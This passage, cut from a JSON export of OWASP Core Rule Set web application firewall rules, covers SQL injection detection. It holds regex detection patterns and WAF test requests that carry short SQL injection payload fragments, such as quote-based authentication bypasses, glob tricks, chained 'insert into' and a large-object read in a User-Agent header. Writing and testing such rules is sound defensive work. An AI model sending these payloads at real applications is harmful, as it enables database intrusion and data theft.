"(?i)\\b(?:json(?:_[0-9A-Z_a-z]+)?|a(?:bs|(?:cos|sin)h?|tan[2h]?|vg)|c(?:eil(?:ing)?|h(?:a(?:nges|r(?:set)?)|r)|o(?:alesce|sh?|unt)|ast)|d(?:e(?:grees|fault)|a(?:te|y))|exp|f(?:loor(?:avg)?|ormat|ield)|g(?:lob|roup_concat)|h(?:ex|our)|i(?:f(?:null)?|if|n(?:str)?)|l(?:ast(?:_insert_rowid)?|ength|ike(?:l(?:ihood|y))?|n|o(?:ad_extension|g(?:10|2)?|wer(?:pi)?|cal)|trim)|m(?:ax|in(?:ute)?|o(?:d|nth))|n(?:ullif|ow)|p(?:i|ow(?:er)?|rintf|assword)|quote|r(?:a(?:dians|ndom(?:blob)?)|e(?:p(?:lace|eat)|verse)|ound|trim|ight)|s(?:i(?:gn|nh?)|oundex|q(?:lite_(?:compileoption_(?:get|used)|offset|source_id|version)|rt)|u(?:bstr(?:ing)?|m)|econd|leep)|t(?:anh?|otal(?:_changes)?|r(?:im|unc)|ypeof|ime)|u(?:n(?:icode|likely)|(?:pp|s)er)|zeroblob|bin|v(?:alues|ersion)|week|year)[^0-9A-Z_a-z]*\\(", "actions": [ { "act_name": "id", "lineno": 763, "act_quote": "no_quote", "act_arg": "942150", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 764, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 765, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 766, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 767, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 767, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 768, "act_quote": "quotes", "act_arg": "SQL Injection Attack: SQL function name detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 769, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 770, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 771, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 772, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 773, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 774, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 775, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 776, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 777, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 778, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 779, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 780, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 781, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 762 } }, { "rule_id": "942180", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)(?:/\\*)+[\\\"'`]+[\\s\\x0b]?(?:--|[#\\{]|/\\*)?|[\\\"'`](?:[\\s\\x0b]*(?:(?:x?or|and|div|like|between)[\\s\\x0b\\-0-9A-Z_a-z]+[\\(\\)\\+-\\-<->][\\s\\x0b]*[\\\"'0-9`]|[!=\\|](?:[\\s\\x0b!\\+\\-0-9=]+[^\\[]*[\\\"'\\(`].*|[\\s\\x0b!0-9=]+[^0-9]*[0-9]+)$|(?:like|print)[^0-9A-Z_a-z]+[\\\"'\\(0-9A-Z_-z]|;)|(?:[<>~]+|[\\s\\x0b]*[^\\s\\x0b0-9A-Z_a-z]?=[\\s\\x0b]*|[^0-9A-Z_a-z]*?[\\+=]+[^0-9A-Z_a-z]*?)[\\\"'`])|[0-9][\\\"'`][\\s\\x0b]+[\\\"'`][\\s\\x0b]+[0-9]|^admin[\\s\\x0b]*?[\\\"'`]|[\\s\\x0b\\\"'\\(`][\\s\\x0b]*?glob[^0-9A-Z_a-z]+[\\\"'\\(0-9A-Z_-z]|[\\s\\x0b]is[\\s\\x0b]*?0[^0-9A-Z_a-z]|where[\\s\\x0b][\\s\\x0b,-\\.0-9A-Z_a-z]+[\\s\\x0b]=", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL authentication bypass attempts 1/3", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "basic SQL authentication bypass", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=3%27%20%27%201", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=3%27%20%27%201" } ] }, { "description": "basic SQL authentication bypass SQLite ", "test_id": 2, "request": { "method": "GET", "uri": "/get?var=%27%3b", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%27%3b" } ] }, { "description": "basic SQL authentication bypass SQLite glob", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=%27glob%201%3b", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%27glob%201%3b" } ] }, { "description": "basic SQL authentication bypass SQLserver", "test_id": 4, "request": { "method": "GET", "uri": "/get?var=%27%3bprint%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%27%3bprint%27" } ] }, { "description": "basic SQL authentication bypass Mysql 1", "test_id": 5, "request": { "method": "GET", "uri": "/get?var=%27%3b%23", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%27%3b%23" } ] }, { "description": "basic SQL authentication bypass sqlite glob 2", "test_id": 6, "request": { "method": "GET", "uri": "/get?var=%27or%28id%20glob%201%29--", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%27or%28id%20glob%201%29--" } ] }, { "description": "basic SQL authentication bypass sqlite glob 3", "test_id": 7, "request": { "method": "GET", "uri": "/get?var=%27or%28glob%201%29--", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%27or%28glob%201%29--" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 805, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:/\\*)+[\\\"'`]+[\\s\\x0b]?(?:--|[#\\{]|/\\*)?|[\\\"'`](?:[\\s\\x0b]*(?:(?:x?or|and|div|like|between)[\\s\\x0b\\-0-9A-Z_a-z]+[\\(\\)\\+-\\-<->][\\s\\x0b]*[\\\"'0-9`]|[!=\\|](?:[\\s\\x0b!\\+\\-0-9=]+[^\\[]*[\\\"'\\(`].*|[\\s\\x0b!0-9=]+[^0-9]*[0-9]+)$|(?:like|print)[^0-9A-Z_a-z]+[\\\"'\\(0-9A-Z_-z]|;)|(?:[<>~]+|[\\s\\x0b]*[^\\s\\x0b0-9A-Z_a-z]?=[\\s\\x0b]*|[^0-9A-Z_a-z]*?[\\+=]+[^0-9A-Z_a-z]*?)[\\\"'`])|[0-9][\\\"'`][\\s\\x0b]+[\\\"'`][\\s\\x0b]+[0-9]|^admin[\\s\\x0b]*?[\\\"'`]|[\\s\\x0b\\\"'\\(`][\\s\\x0b]*?glob[^0-9A-Z_a-z]+[\\\"'\\(0-9A-Z_-z]|[\\s\\x0b]is[\\s\\x0b]*?0[^0-9A-Z_a-z]|where[\\s\\x0b][\\s\\x0b,-\\.0-9A-Z_a-z]+[\\s\\x0b]=", "actions": [ { "act_name": "id", "lineno": 806, "act_quote": "no_quote", "act_arg": "942180", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 807, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 808, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 809, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 810, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 810, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 811, "act_quote": "quotes", "act_arg": "Detects basic SQL authentication bypass attempts 1/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 812, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 813, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 814, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 815, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 816, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 817, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 818, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 819, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 820, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 821, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 822, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 823, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 824, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 805 } }, { "rule_id": "942200", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i),.*?[\\\"'\\)0-9`-f][\\\"'`](?:[\\\"'`].*?[\\\"'`]|(?:\\r?\\n)?\\z|[^\\\"'`]+)|[^0-9A-Z_a-z]select.+[^0-9A-Z_a-z]*?from|(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\\s\\x0b]*?\\([\\s\\x0b]*?space[\\s\\x0b]*?\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects MySQL comment-/space-obfuscated injections and backtick termination", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "comment-/space-obfuscated injections and backtick termination", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ",varname%22=somedata" }, "expected": { "should_block": true, "rule_ids": [ 942200 ] }, "malicious_patterns": [ { "location": "post_body", "value": ",varname%22=somedata" } ] }, { "description": "comment-/space-obfuscated injections and backtick termination in request headers", "test_id": 2, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "encode(lo_get(16400),'base64')::int", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942200 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 834, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i),.*?[\\\"'\\)0-9`-f][\\\"'`](?:[\\\"'`].*?[\\\"'`]|(?:\\r?\\n)?\\z|[^\\\"'`]+)|[^0-9A-Z_a-z]select.+[^0-9A-Z_a-z]*?from|(?:alter|(?:(?:cre|trunc|upd)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\\s\\x0b]*?\\([\\s\\x0b]*?space[\\s\\x0b]*?\\(", "actions": [ { "act_name": "id", "lineno": 835, "act_quote": "no_quote", "act_arg": "942200", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 836, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 837, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 838, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 839, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 839, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 840, "act_quote": "quotes", "act_arg": "Detects MySQL comment-/space-obfuscated injections and backtick termination", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 841, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 842, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 843, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 844, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 845, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 846, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 847, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 848, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 849, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 850, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 851, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 852, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 853, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 834 } }, { "rule_id": "942210", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)(?:&&|\\|\\||and|between|div|like|n(?:and|ot)|(?:xx?)?or)[\\s\\x0b\\(]+[0-9A-Z_a-z]+[\\s\\x0b\\)]*?[!\\+=]+[\\s\\x0b0-9]*?[\\\"'-\\)=`]|[0-9](?:[\\s\\x0b]*?(?:and|between|div|like|x?or)[\\s\\x0b]*?[0-9]+[\\s\\x0b]*?[\\+\\-]|[\\s\\x0b]+group[\\s\\x0b]+by.+\\()|/[0-9A-Z_a-z]+;?[\\s\\x0b]+(?:and|between|div|having|like|x?or|select)[^0-9A-Z_a-z]|(?:[#;]|--)[\\s\\x0b]*?(?:alter|drop|(?:insert|update)[\\s\\x0b]*?[0-9A-Z_a-z]{2,})|@.+=[\\s\\x0b]*?\\([\\s\\x0b]*?select|[^0-9A-Z_a-z]SET[\\s\\x0b]*?@[0-9A-Z_a-z]+", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects chained SQL injection attempts 1/2", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects chained SQL injection attempts", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var%3d%20@.%3d%20%28%20SELECT" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var%3d%20@.%3d%20%28%20SELECT" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+2771%3D1709%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+2771%3D1709%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%3B+insert+into" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%3B+insert+into" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+7639%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+7639%3D%28" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Dor+120%3D121%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Dor+120%3D121%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DAND+deleted+%3D+0%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DAND+deleted+%3D+0%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%2FCm7+OR+" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%2FCm7+OR+" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3DOR+%287319%3D8742%29" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3DOR+%287319%3D8742%29" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3D%7C%7C%28null%21%3D" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3D%7C%7C%28null%21%3D" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Dand+1%21%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Dand+1%21%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay%3Ddiv+role%3D%22" }, "expected": { "should_block": true, "rule_ids": [ 942210 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay%3Ddiv+role%3D%22" } ] }, { "description": "Detects chained SQL injection attempts", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": 